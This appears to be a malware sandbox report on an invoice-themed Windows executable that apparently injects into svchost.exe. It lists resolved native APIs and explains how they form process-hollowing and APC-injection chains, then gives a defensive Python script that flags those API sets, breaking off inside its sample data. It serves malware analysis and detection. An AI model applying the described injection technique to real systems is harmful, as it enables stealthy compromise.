Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97A6C0 8_2_1E97A6C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F6F6 8_2_1E97F6F6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BC6E0 8_2_1E8BC6E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9336EC 8_2_1E9336EC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DC600 8_2_1E8DC600
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95D62C 8_2_1E95D62C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96D646 8_2_1E96D646
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E4670 8_2_1E8E4670
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E976757 8_2_1E976757
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C2760 8_2_1E8C2760
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CA760 8_2_1E8CA760
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92D480 8_2_1E92D480
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0445 8_2_1E8C0445
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9775C6 8_2_1E9775C6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F5C9 8_2_1E97F5C9
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E98A526 8_2_1E98A526
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AD2EC 8_2_1E8AD2EC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E882245 8_2_1E882245
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97124C 8_2_1E97124C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1380 8_2_1E8B1380
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CE310 8_2_1E8CE310
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97F330 8_2_1E97F330
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F508C 8_2_1E8F508C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B00A0 8_2_1E8B00A0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CB0D0 8_2_1E8CB0D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E9770F1 8_2_1E9770F1
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96E076 8_2_1E96E076
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C51C0 8_2_1E8C51C0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DB1E0 8_2_1E8DB1E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E98010E 8_2_1E98010E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AF113 8_2_1E8AF113
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95D130 8_2_1E95D130
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E90717A 8_2_1E90717A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B31380 11_2_03B31380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF330 11_2_03BFF330
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4E310 11_2_03B4E310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B2D2EC 11_2_03B2D2EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF124C 11_2_03BF124C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B02245 11_2_03B02245
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5B1E0 11_2_03B5B1E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B451C0 11_2_03B451C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BDD130 11_2_03BDD130
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B2F113 11_2_03B2F113
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B8717A 11_2_03B8717A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03C0010E 11_2_03C0010E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B300A0 11_2_03B300A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B7508C 11_2_03B7508C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF70F1 11_2_03BF70F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4B0D0 11_2_03B4B0D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BEE076 11_2_03BEE076
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B42760 11_2_03B42760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4A760 11_2_03B4A760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF6757 11_2_03BF6757
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40680 11_2_03B40680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF6F6 11_2_03BFF6F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B3C6E0 11_2_03B3C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB36EC 11_2_03BB36EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFA6C0 11_2_03BFA6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BDD62C 11_2_03BDD62C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5C600 11_2_03B5C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B64670 11_2_03B64670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BED646 11_2_03BED646
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF5C9 11_2_03BFF5C9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF75C6 11_2_03BF75C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03C0A526 11_2_03C0A526
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BAD480 11_2_03BAD480
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40445 11_2_03B40445
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB4BC0 11_2_03BB4BC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFB2E 11_2_03BFFB2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40B10 11_2_03B40B10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B7DB19 11_2_03B7DB19
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5FAA0 11_2_03B5FAA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFA89 11_2_03BFFA89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFCA13 11_2_03BFCA13
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFEA5B 11_2_03BFEA5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B3E9A0 11_2_03B3E9A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFE9A6 11_2_03BFE9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B099E8 11_2_03B099E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B859C0 11_2_03B859C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB98B2 11_2_03BB98B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B56882 11_2_03B56882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF78F3 11_2_03BF78F3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF18DA 11_2_03BF18DA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B428C0 11_2_03B428C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BE0835 11_2_03BE0835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B6E810 11_2_03B6E810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B43800 11_2_03B43800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B49870 11_2_03B49870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5B870 11_2_03B5B870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BB5870 11_2_03BB5870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFF872 11_2_03BFF872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B26868 11_2_03B26868
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFEFBF 11_2_03BFEFBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B46FE0 11_2_03B46FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF1FC6 11_2_03BF1FC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4CF00 11_2_03B4CF00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFF63 11_2_03BFFF63
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B41EB2 11_2_03B41EB2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF0EAD 11_2_03BF0EAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B32EE8 11_2_03B32EE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF9ED2 11_2_03BF9ED2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BE0E6D 11_2_03BE0E6D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B60E50 11_2_03B60E50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B82E48 11_2_03B82E48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B52DB0 11_2_03B52DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BDFDF4 11_2_03BDFDF4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B49DD0 11_2_03B49DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFFD27 11_2_03BFFD27
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B3AD00 11_2_03B3AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B40D69 11_2_03B40D69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF7D4C 11_2_03BF7D4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BD9C98 11_2_03BD9C98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03C0ACEB 11_2_03C0ACEB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BC7CE8 11_2_03BC7CE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B5FCE0 11_2_03B5FCE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B58CDF 11_2_03B58CDF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B4AC20 11_2_03B4AC20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B30C12 11_2_03B30C12
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B43C60 11_2_03B43C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BF6C69 11_2_03BF6C69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BFEC60 11_2_03BFEC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03BEEC4C 11_2_03BEEC4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9BE9F 11_2_02D9BE9F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D82FB0 11_2_02D82FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9CF40 11_2_02D9CF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D88C80 11_2_02D88C80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D88C7B 11_2_02D88C7B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D82D90 11_2_02D82D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D82D87 11_2_02D82D87
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B910 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75050 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87BE4 appears 96 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAE692 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBEF10 appears 105 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E8F5050 appears 36 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E93EF10 appears 105 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E907BE4 appears 95 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E8AB910 appears 268 times
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: String function: 1E92E692 appears 86 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0243265F NtProtectVirtualMemory, 1_2_0243265F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242CB27 NtAllocateVirtualMemory,LoadLibraryA, 1_2_0242CB27
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242FCFD NtWriteVirtualMemory, 1_2_0242FCFD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0243069C NtWriteVirtualMemory, 1_2_0243069C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_1E8F2EB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk, 8_2_1E8F2ED0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2E50 NtCreateSection,LdrInitializeThunk, 8_2_1E8F2E50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2F00 NtCreateFile,LdrInitializeThunk, 8_2_1E8F2F00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk, 8_2_1E8F2CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk, 8_2_1E8F2C30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_1E8F2C50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2DA0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_1E8F2DA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_1E8F2DC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk, 8_2_1E8F2D10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_1E8F2B90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2BC0 NtQueryInformationToken,LdrInitializeThunk, 8_2_1E8F2BC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_1E8F2B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F29F0 NtReadFile,LdrInitializeThunk, 8_2_1E8F29F0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk, 8_2_1E8F34E0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2E80 NtCreateProcessEx, 8_2_1E8F2E80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2EC0 NtQuerySection, 8_2_1E8F2EC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2E00 NtQueueApcThread, 8_2_1E8F2E00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2FB0 NtSetValueKey, 8_2_1E8F2FB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2F30 NtOpenDirectoryObject, 8_2_1E8F2F30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F3C90 NtOpenThread, 8_2_1E8F3C90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2CD0 NtEnumerateKey, 8_2_1E8F2CD0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C10 NtOpenProcess, 8_2_1E8F2C10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C20 NtSetInformationFile, 8_2_1E8F2C20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F3C30 NtOpenProcessToken, 8_2_1E8F3C30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2D50 NtWriteVirtualMemory, 8_2_1E8F2D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2A80 NtClose, 8_2_1E8F2A80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2AA0 NtQueryInformationFile, 8_2_1E8F2AA0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2AC0 NtEnumerateValueKey, 8_2_1E8F2AC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2A10 NtWriteFile, 8_2_1E8F2A10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B80 NtCreateKey, 8_2_1E8F2B80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2BE0 NtQueryVirtualMemory, 8_2_1E8F2BE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B00 NtQueryValueKey, 8_2_1E8F2B00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B20 NtQueryInformationProcess, 8_2_1E8F2B20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F38D0 NtGetContextThread, 8_2_1E8F38D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F29D0 NtWaitForSingleObject, 8_2_1E8F29D0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F4570 NtSuspendThread, 8_2_1E8F4570
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F4260 NtSetContextThread, 8_2_1E8F4260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B734E0 NtCreateMutant,LdrInitializeThunk, 11_2_03B734E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B90 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_03B72B90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B80 NtCreateKey,LdrInitializeThunk, 11_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72BC0 NtQueryInformationToken,LdrInitializeThunk, 11_2_03B72BC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B10 NtAllocateVirtualMemory,LdrInitializeThunk, 11_2_03B72B10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B00 NtQueryValueKey,LdrInitializeThunk, 11_2_03B72B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72A80 NtClose,LdrInitializeThunk, 11_2_03B72A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B729F0 NtReadFile,LdrInitializeThunk, 11_2_03B729F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72F00 NtCreateFile,LdrInitializeThunk, 11_2_03B72F00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72E50 NtCreateSection,LdrInitializeThunk, 11_2_03B72E50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 11_2_03B72DC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72D10 NtQuerySystemInformation,LdrInitializeThunk, 11_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72CF0 NtDelayExecution,LdrInitializeThunk, 11_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C30 NtMapViewOfSection,LdrInitializeThunk, 11_2_03B72C30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B74260 NtSetContextThread, 11_2_03B74260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B74570 NtSuspendThread, 11_2_03B74570
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72BE0 NtQueryVirtualMemory, 11_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72B20 NtQueryInformationProcess, 11_2_03B72B20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72AA0 NtQueryInformationFile, 11_2_03B72AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72AC0 NtEnumerateValueKey, 11_2_03B72AC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72A10 NtWriteFile, 11_2_03B72A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B729D0 NtWaitForSingleObject, 11_2_03B729D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B738D0 NtGetContextThread, 11_2_03B738D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72FB0 NtSetValueKey, 11_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72F30 NtOpenDirectoryObject, 11_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72EB0 NtProtectVirtualMemory, 11_2_03B72EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72E80 NtCreateProcessEx, 11_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72ED0 NtResumeThread, 11_2_03B72ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72EC0 NtQuerySection, 11_2_03B72EC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72E00 NtQueueApcThread, 11_2_03B72E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72DA0 NtReadVirtualMemory, 11_2_03B72DA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72D50 NtWriteVirtualMemory, 11_2_03B72D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B73C90 NtOpenThread, 11_2_03B73C90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72CD0 NtEnumerateKey, 11_2_03B72CD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B73C30 NtOpenProcessToken, 11_2_03B73C30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C20 NtSetInformationFile, 11_2_03B72C20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C10 NtOpenProcess, 11_2_03B72C10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C50 NtUnmapViewOfSection, 11_2_03B72C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D98690 NtReadFile, 11_2_02D98690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D987C0 NtAllocateVirtualMemory, 11_2_02D987C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D98710 NtClose, 11_2_02D98710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D985E0 NtCreateFile, 11_2_02D985E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9868D NtReadFile, 11_2_02D9868D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D987C2 NtAllocateVirtualMemory, 11_2_02D987C2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9870A NtClose, 11_2_02D9870A
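The native-API inventory above is most useful when read as a chain rather than as a list: a process that resolves NtUnmapViewOfSection, NtMapViewOfSection, NtSetContextThread and NtResumeThread has the primitives for process hollowing, NtOpenThread plus NtQueueApcThread give it APC injection, and the wntdll.pdb debug strings found at non-ntdll addresses later in this section indicate the calls are made through a privately mapped copy of ntdll rather than the hooked one. The Python below is an added triage script by the editor, not part of this report or of any Joe Sandbox tooling: it parses "Code function" lines in the format used above, groups resolved APIs by process index, and reports which stage sets are complete per process. The stage groupings are the editor's own assumption, and the embedded sample is a subset of lines copied from this section plus one address-only line to show that lines without a resolved API are ignored.

```python
import re
from collections import defaultdict

# Matches the report's "Code function" lines, e.g.
#   Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_03B72C30 NtMapViewOfSection,LdrInitializeThunk, 11_2_03B72C30
# The function id is <process index>_<dump index>_<address>. Lines that carry
# only an address and no API name do not match and are skipped.
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?)\s+Code function:\s+"
    r"(?P<fid>(?P<pid>\d+)_\d+_[0-9A-Fa-f]+)\s+"
    r"(?P<apis>[A-Za-z0-9_]+(?:,[A-Za-z0-9_]*)*)\s+(?P=fid)\s*$"
)

# Editor's grouping of primitives into injection stages (an assumption, not a
# report category). A stage counts as present only when every listed API was
# resolved in the same process.
STAGES = {
    "remote_write":  {"NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory"},
    "hollowing":     {"NtUnmapViewOfSection", "NtMapViewOfSection", "NtSetContextThread", "NtResumeThread"},
    "apc_injection": {"NtOpenThread", "NtQueueApcThread", "NtResumeThread"},
    "evasion_probe": {"NtDelayExecution", "NtQueryInformationProcess"},
}


def parse_report(lines):
    """Map '<image>#<process index>' to the set of API names resolved in that process."""
    apis_by_proc = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        image = m.group("proc").rsplit("\\", 1)[-1]
        key = f"{image}#{m.group('pid')}"
        apis_by_proc[key].update(a for a in m.group("apis").split(",") if a)
    return dict(apis_by_proc)


def assess(apis):
    """Per stage: True when every API the stage needs is in `apis`."""
    return {stage: needed <= apis for stage, needed in STAGES.items()}


def triage(lines):
    return {proc: assess(apis) for proc, apis in parse_report(lines).items()}


def flagged(lines, stage="hollowing"):
    """Process keys in which `stage` is completely present, sorted for stable output."""
    return sorted(proc for proc, result in triage(lines).items() if result[stage])


# Constructed sample: a subset of lines copied from this report section, plus one
# address-only line (first entry) that the parser must ignore.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_02D9BE9F 11_2_02D9BE9F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0243265F NtProtectVirtualMemory, 1_2_0243265F
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242CB27 NtAllocateVirtualMemory,LoadLibraryA, 1_2_0242CB27
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 1_2_0242FCFD NtWriteVirtualMemory, 1_2_0242FCFD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_1E8F2EB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2ED0 NtResumeThread,LdrInitializeThunk, 8_2_1E8F2ED0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2CF0 NtDelayExecution,LdrInitializeThunk, 8_2_1E8F2CF0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C30 NtMapViewOfSection,LdrInitializeThunk, 8_2_1E8F2C30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2C50 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_1E8F2C50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_1E8F2B10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8F2E00 NtQueueApcThread, 8_2_1E8F2E00
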